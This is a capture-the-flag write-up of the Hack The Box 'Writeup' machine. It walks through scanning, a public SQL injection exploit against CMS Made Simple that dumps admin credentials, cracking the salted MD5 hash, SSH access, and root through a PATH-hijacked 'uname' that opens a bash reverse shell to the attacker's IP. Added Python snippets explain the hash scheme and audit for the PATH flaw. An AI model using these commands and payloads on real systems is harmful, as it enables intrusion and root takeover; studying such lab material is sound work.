Writeup

From Luniwiki

Ports scan

u505@kali:~/HTB/Machines/Writeup$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.138 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-25 13:03:47 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.138
Discovered open port 22/tcp on 10.10.10.138
u505@kali:~/HTB/Machines/Writeup$ nmap -sC -sV 10.10.10.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 08:01 EST
Nmap scan report for writeup.htb (10.10.10.138)
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.29 seconds

Web

The web site is a geek-style page, but it carries a warning: a DoS protection script watches for Apache 40x errors and bans IPs that produce too many of them. So we cannot run a directory brute-force against the site.


u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb
<html lang="en_US">
 <head><title>Nothing here yet.</title><style>.footer { background-color: #A0A0FF; position: fixed; left: 0; bottom: 0; width: 100%; color: black; text-align: center; }</style></head>
 <body bgcolor="#4040E0">
 <center><pre>
 <font color="#FF6666">
 ########################################################################
 #                                                                      #
 #           *** NEWS *** NEWS *** NEWS *** NEWS *** NEWS ***           #
 #                                                                      #
 #   Not yet live and already under attack. I found an   ,~~--~~-.      #
 #   Eeyore DoS protection script that is in place and   +      | |\    #
 #   watches for Apache 40x errors and bans bad IPs.     || |~ |`,/-\   #
 #   Hope you do not get hit by false-positive drops!    *\_) \_) `-'   #
 #                                                                      #
 #   If you know where to download the proper Donkey DoS protection     #
 #   please let me know via mail to jkr@writeup.htb - thanks!           #
 #                                                                      #
 ########################################################################
 </font>
 <b>
 <font color="#A0A0FF">
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 88888888888888888888888888888888888888888888888888888
 8888"""""""""""""""8888888888888888888888888888888888
 8888               8888888888888888888888888888888888
 8888  HTB NOTES    8888888888888888888888888888888888
 8888               888888888888888888888888888888888"
 8888aaaaaaaaaaaaaaa888888888888888888888888888888888a
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888":::::"88888888888888888888888
 888888888888888888888::;gPPRg;::888888888888888888888
 88888888888888888888::dP'   `Yb::88888888888888888888
 88888888888888888888::8)     (8::88888888888888888888
 88888888888888888888;:Yb     dP:;88( )888888888888888
 888888888888888888888;:"8ggg8":;888888888888888888888
 88888888888888888888888aa:::aa88888888888888888888888
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888888888888888888888888888888888
 88888888888888888888888888"88888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 8888888888888888888888888:::8888888888888888888888888
 88888888888888888888888888a88888888888888888888888888
 """""""""""""""""""' `"""""""""' `"""""""""""""""""""
                               (c) by Normand Veilleux
 <br>
 <br>
 I am still searching through my backups so there is
 nothing here yet. I am preparing go-live of my own
 www.hackthebox.eu write-up page soon. Stay tuned!
 <br>
 <br>
 <br>
 <br>
 <br>
 <br>
 </pre></center></b>
 <div class="footer"><p><pre>Page is hand-crafted with vi.</pre></p></div>
 </body>
 </html>

Robots.txt

The robots.txt file gives us a clue about a URL to visit (Nmap found it too).

u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb/robots.txt
#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `------`

# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/

/writeup/

The Generator meta tag shows that the CMS is CMS Made Simple.

u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb/writeup/
<!doctype html>
 <html lang="en_US"><head>
         <title>Home - writeup</title>
 <base href="http://writeup.htb/writeup/" />
 <meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
         <!-- cms_stylesheet error: No stylesheets matched the criteria specified -->
 <style>.footer { background-color: white; position: fixed; left: 0; bottom: 0; width: 100%; color: black; text-align: center; }</style>
 </head><body>
         <header id="header">
                 <h1>writeup</h1>
         </header>
         <nav id="menu">
 <ul><li class="currentpage"><a class="currentpage" href="http://writeup.htb/writeup/">Home Page</a></li><li><a href="http://writeup.htb/writeup/index.php?page=ypuffy">ypuffy</a></li><li><a href="http://writeup.htb/writeup/index.php?page=blue">blue</a></li><li><a href="http://writeup.htb/writeup/index.php?page=writeup">writeup</a></li></ul>
         </nav>
         <section id="content">
                 <h1>Home</h1>
                 <p>After many month of lurking around on HTB I also decided to start writing about the boxes I hacked. In the upcoming days, weeks and month you will find more and more content here as I am about to convert my famous incomplete notes into pretty write-ups.</p>
 <p>I am still searching for someone to provide or make a cool theme. If you are interested, please contact me on <a href="https://mm.netsecfocus.com/">NetSec Focus Mattermost</a>. Thanks.</p>    </section>
 <div class="footer">
   <p>Pages are hand-crafted with vim. NOT.</p>
 </div>
 </body>
 </html>

The copyright notice goes up to 2019, and the machine was released in June 2019. So the version can only be 2.2.9, 2.2.9.1 or 2.2.10 (http://dev.cmsmadesimple.org/project/files/6).


u505@kali:~/HTB/Machines/Writeup$ searchsploit CMS Made Simple
-------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                |  Path
                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code E | exploits/php/remote/46627.rb
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion       | exploits/php/webapps/26217.html
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting       | exploits/php/webapps/26298.txt
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting    | exploits/php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection        | exploits/php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulne | exploits/php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities             | exploits/php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                   | exploits/php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection          | exploits/php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upl | exploits/php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                  | exploits/php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                 | exploits/php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scr | exploits/php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities              | exploits/php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery              | exploits/php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | exploits/php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Reque | exploits/php/webapps/34068.html
CMS Made Simple 2.1.6 - Multiple Vulnerabilities              | exploits/php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                 | exploits/php/webapps/44192.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | exploits/php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | exploits/php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoni | exploits/php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                      | exploits/php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upl | exploits/php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary Fil | exploits/php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbi | exploits/php/webapps/46546.py
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Writeup$ searchsploit -m 46635
  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Writeup/46635.py

This exploit is a time-based SQL injection. It recovers the username, email, salt and hashed password of the admin user.

u505@kali:~/HTB/Machines/Writeup$ python 46635.py -u http://10.10.10.138/writeup/
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

We create the hash file for hashcat in the hash:salt format.

u505@kali:~/HTB/Machines/Writeup$ cat hash.txt
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807

And we brute-force it with hashcat, mode 20 (md5($salt.$pass)).

u505@kali:~/HTB/Machines/Writeup$ hashcat --force -m 20 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Writeup$ hashcat --force -m 20 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
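To understand what hashcat mode 20 actually did, here is a small check of the recovered values, added here and not part of the original writeup. It reproduces the md5($salt.$pass) computation on the hash, salt and password shown above, and also computes the other concatenation order (hashcat mode 10, md5($pass.$salt)) to show that picking the wrong mode silently fails to match. The mini wordlist is constructed for the example; the hash format parser follows the hash:salt[:plain] layout of hash.txt and the --show output.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

# Values copied from the writeup above: stored hash, site salt, and the
# plaintext that hashcat -m 20 returned.
STORED_HASH = "62def4866937f08cc13bab43bb14e6f7"
SALT = "5a599ef579066807"
# Constructed mini wordlist standing in for rockyou.txt.
CANDIDATES = ["password", "letmein", "raykayjay9", "hackthebox"]


def md5_salt_pass(salt: str, password: str) -> str:
    """hashcat -m 20: MD5 over the salt followed by the password."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def md5_pass_salt(salt: str, password: str) -> str:
    """hashcat -m 10: MD5 over the password followed by the salt (the other order)."""
    return hashlib.md5((password + salt).encode()).hexdigest()


def verify(stored_hash: str, salt: str, candidate: str) -> bool:
    """Constant-time comparison of a candidate against the stored digest."""
    return hmac.compare_digest(md5_salt_pass(salt, candidate), stored_hash.lower())


def crack(stored_hash: str, salt: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack in the md5($salt.$pass) scheme; None if no word matches."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if verify(stored_hash, salt, word):
            return word
    return None


def parse_hashcat_line(line: str) -> Tuple[str, str, Optional[str]]:
    """Split 'hash:salt' or 'hash:salt:plain' as written in hash.txt / --show output."""
    parts = line.strip().split(":")
    if len(parts) < 2:
        raise ValueError("expected hash:salt[:plain]")
    plain = parts[2] if len(parts) > 2 else None
    return parts[0], parts[1], plain


if __name__ == "__main__":
    digest, salt, _ = parse_hashcat_line(STORED_HASH + ":" + SALT)
    print("mode 20 match:", crack(digest, salt, CANDIDATES))
    print("mode 10 would match:", md5_pass_salt(salt, "raykayjay9") == digest)
```

The point for a defender is that a single unsalted-per-user, fast MD5 round offers no real resistance to a dictionary attack once the hash and the site-wide salt leak; a password hashing function such as bcrypt or Argon2 with a per-user salt is what the stored form should have been.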

User Flag

With the user and password, we can ssh into the server.

u505@kali:~/HTB/Machines/Writeup$ ssh jkr@writeup.htb
The authenticity of host 'writeup.htb (10.10.10.138)' can't be established.
ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'writeup.htb,10.10.10.138' (ECDSA) to the list of known hosts.
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$ cat user.txt
<USER_FLAG>

Local enumeration

u505@kali:~/HTB/Machines/Writeup/www$ ls -ltr
total 3056
-rw-r--r-- 1 u505 u505   46631 Feb  9 21:32 LinEnum.sh
-rw-r--r-- 1 u505 u505 3078592 Feb  9 21:32 pspy64
u505@kali:~/HTB/Machines/Writeup/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

From the target server

jkr@writeup:~$ cd /tmp/
jkr@writeup:/tmp$ wget -q http://10.10.14.30/pspy64
jkr@writeup:/tmp$ wget -q http://10.10.14.30/LinEnum.sh
jkr@writeup:/tmp$ chmod +x pspy64 LinEnum.sh

LinEnum.sh doesn't give us any clue on how to escalate privileges. Running pspy64, however, shows a cron job executed by root:

2020/02/25 09:27:01 CMD: UID=0    PID=2502   | /usr/sbin/CRON
2020/02/25 09:27:01 CMD: UID=0    PID=2503   | /usr/sbin/CRON
2020/02/25 09:27:01 CMD: UID=0    PID=2504   | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1

There is a cron job running as root, but we cannot read the file /root/bin/cleanup.pl.

ssh login

When we start a new ssh session, pspy shows the following commands being executed as root (UID=0):

2020/02/25 09:27:27 CMD: UID=0    PID=2506   | sshd: [accepted]
2020/02/25 09:27:27 CMD: UID=0    PID=2507   | sshd: [accepted]
2020/02/25 09:27:35 CMD: UID=0    PID=2508   | sshd: jkr [priv]
2020/02/25 09:27:35 CMD: UID=0    PID=2509   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2020/02/25 09:27:35 CMD: UID=0    PID=2510   | run-parts --lsbsysinit /etc/update-motd.d
2020/02/25 09:27:35 CMD: UID=0    PID=2511   | uname -rnsom
2020/02/25 09:27:35 CMD: UID=0    PID=2512   | sshd: jkr [priv]
2020/02/25 09:27:35 CMD: UID=1000 PID=2513   | -bash
2020/02/25 09:27:35 CMD: UID=1000 PID=2514   | -bash
2020/02/25 09:27:35 CMD: UID=1000 PID=2515   | -bash
2020/02/25 09:27:36 CMD: UID=1000 PID=2516   | -bash
2020/02/25 09:27:36 CMD: UID=1000 PID=2517   | -bash

In the folder /etc/update-motd.d/ we find the file 10-uname, which is what run-parts executes to build the MOTD:

jkr@writeup:~$ ls -l /etc/update-motd.d/
total 4
-rwxr-xr-x 1 root root 23 Jun  3  2018 10-uname
jkr@writeup:~$ cat /etc/update-motd.d/10-uname
#!/bin/sh
uname -rnsom
jkr@writeup:~$ uname -rnsom
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

We cannot change the file 10-uname (it is owned by root and only writable by root), but note that it calls uname without an absolute path.

jkr@writeup:~$ whereis uname
uname: /bin/uname /usr/share/man/man1/uname.1.gz

The real uname command is located in /bin/. Our user is in the group staff:

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

These are the folders in the PATH that pspy showed for the run-parts invocation. The first two are group-writable (setgid) by staff; the rest are only writable by root:

jkr@writeup:~$ ls -ld /usr/local/sbin/
drwx-wsr-x 2 root staff 12288 Apr 19  2019 /usr/local/sbin/
jkr@writeup:~$ ls -ld /usr/local/bin/
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin/
jkr@writeup:~$ ls -ld /usr/sbin/
drwxr-xr-x 2 root root 4096 Aug 23  2019 /usr/sbin/
jkr@writeup:~$ ls -ld /usr/bin/
drwxr-xr-x 2 root root 20480 Aug 23  2019 /usr/bin/
jkr@writeup:~$ ls -ld /sbin/
drwxr-xr-x 2 root root 4096 Aug 23  2019 /sbin/
jkr@writeup:~$ ls -ld /bin/
drwxr-xr-x 2 root root 4096 Apr 19  2019 /bin/

Since /usr/local/sbin and /usr/local/bin come before /bin in that PATH and we can write to them, the strategy is to create a new uname command there that opens a reverse shell; the MOTD script will then run it as root.
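The condition exploited above is easy to audit for, so here is a small checker, added here as an example and not part of the original writeup, that reproduces the reasoning of the last few steps: it takes a root-run script, the PATH it runs with, a table of directory permissions and a user's groups, and reports every command the script invokes by relative name that resolves through a directory the user can write to before reaching the real binary. The directory table, PATH, script and group list are transcribed from the ls -ld, pspy, cat and id output above; the mapping of uname to /bin/uname comes from the whereis output. Everything else (the function names, the heuristic that treats the first word of a line as the command) is an assumption of this example.

```python
import os
import shlex
from typing import Dict, List, Set, Tuple

# Transcribed from the `ls -ld` output above: directory -> (owner, group, symbolic mode).
DIR_TABLE: Dict[str, Tuple[str, str, str]] = {
    "/usr/local/sbin": ("root", "staff", "drwx-wsr-x"),
    "/usr/local/bin":  ("root", "staff", "drwx-wsr-x"),
    "/usr/sbin":       ("root", "root",  "drwxr-xr-x"),
    "/usr/bin":        ("root", "root",  "drwxr-xr-x"),
    "/sbin":           ("root", "root",  "drwxr-xr-x"),
    "/bin":            ("root", "root",  "drwxr-xr-x"),
}
# From `whereis uname`; any command not listed is treated as "location unknown".
REAL_BINARIES: Dict[str, str] = {"uname": "/bin/uname"}
# PATH as shown in the pspy line for run-parts.
PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Content of /etc/update-motd.d/10-uname.
SCRIPT_10_UNAME = "#!/bin/sh\nuname -rnsom\n"
# Groups of jkr from `id`.
JKR_GROUPS: Set[str] = {"jkr", "cdrom", "floppy", "audio", "dip", "video",
                        "plugdev", "staff", "netdev"}


def group_writable(mode: str) -> bool:
    """In 'drwx-wsr-x' the group triple is mode[4:7]; 'w' at index 5 is group write."""
    return len(mode) == 10 and mode[5] == "w"


def other_writable(mode: str) -> bool:
    return len(mode) == 10 and mode[8] == "w"


def writable_by(path: str, user: str, groups: Set[str],
                table: Dict[str, Tuple[str, str, str]]) -> bool:
    """True if `user` (with `groups`) can create files in directory `path`."""
    owner, group, mode = table[path]
    if owner == user and mode[2] == "w":
        return True
    if group in groups and group_writable(mode):
        return True
    return other_writable(mode)


def relative_commands(script: str) -> List[str]:
    """First word of each non-comment line that is not an absolute path or an assignment.
    Heuristic (assumption of this example): good enough for short run-parts scripts."""
    found = []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        first = shlex.split(line)[0]
        if first.startswith("/") or "=" in first:
            continue
        found.append(first)
    return found


def hijackable(script: str, path: str, table: Dict[str, Tuple[str, str, str]],
               real: Dict[str, str], user: str, groups: Set[str]) -> List[Tuple[str, str]]:
    """(command, directory) pairs where a user-writable PATH entry precedes the real binary.
    Lookup stops at the directory holding the real binary; later entries never win."""
    findings = []
    for cmd in relative_commands(script):
        real_dir = os.path.dirname(real.get(cmd, ""))
        for directory in path.split(":"):
            if directory == real_dir:
                break
            if directory in table and writable_by(directory, user, groups, table):
                findings.append((cmd, directory))
    return findings


if __name__ == "__main__":
    for cmd, directory in hijackable(SCRIPT_10_UNAME, PATH, DIR_TABLE, REAL_BINARIES, "jkr", JKR_GROUPS):
        print(f"{cmd}: hijackable via {directory}")
```

Either of two fixes makes the finding disappear: calling /bin/uname by absolute path in 10-uname, or not leaving directories on root's PATH writable by a non-root group (the setgid staff ownership of /usr/local/* is a Debian convention and is exactly what the check flags).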

Escalation of Privileges

jkr@writeup:/tmp$ cat uname
#!/bin/bash
VAR=$*
/bin/bash -i >& /dev/tcp/10.10.14.30/4444 0>&1 &
/bin/uname $VAR

We start the listener on our machine.

u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

If we execute our new uname script, it returns the output of the real uname command, and at the same time it opens a reverse shell to our listener.

jkr@writeup:/tmp$ ./uname -a
Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.138.
Ncat: Connection from 10.10.10.138:40656.

Now, if we copy our "uname" version into /usr/local/bin/, it will be found before the real /bin/uname because /usr/local/bin precedes /bin in the PATH used by run-parts.

jkr@writeup:/tmp$ cp uname /usr/local/bin/

When we log in again from another console, the MOTD script runs our uname as root, which opens the reverse shell.

u505@kali:~/HTB/Machines/Writeup$ ssh jkr@writeup.htb
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
...

Our reverse shell is opened.

u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.138.
Ncat: Connection from 10.10.10.138:40658.
bash: cannot set terminal process group (3145): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# whoami
whoami
root

Root flag

root@writeup:/# cat /root/root.txt
cat /root/root.txt
<ROOT Flag>

Daniel Simao 08:00, 25 February 2020 (EST)